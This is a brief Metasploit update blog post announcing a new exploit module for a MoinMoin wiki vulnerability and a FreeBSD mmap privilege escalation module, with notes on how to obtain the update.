This update also includes an exploit for a vulnerability in MoinMoin, a wiki written in Python, which was used in the wild against wiki.python.org and wiki.debian.org not too long ago. Juan explained this bug in more detail earlier.  Interestingly, MoinMoin has support for FreeBSD, for which this update also includes a local privilege escalation module taking advantage of the fun new mmap vulnerability.

 

Moral of this story: if you're owned, assume you're completely owned. And if you're doing the owning, you get to do the root dance.

 

New Modules

Exploit modules

Auxiliary and post modules

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Filter Blog

By date: By tag: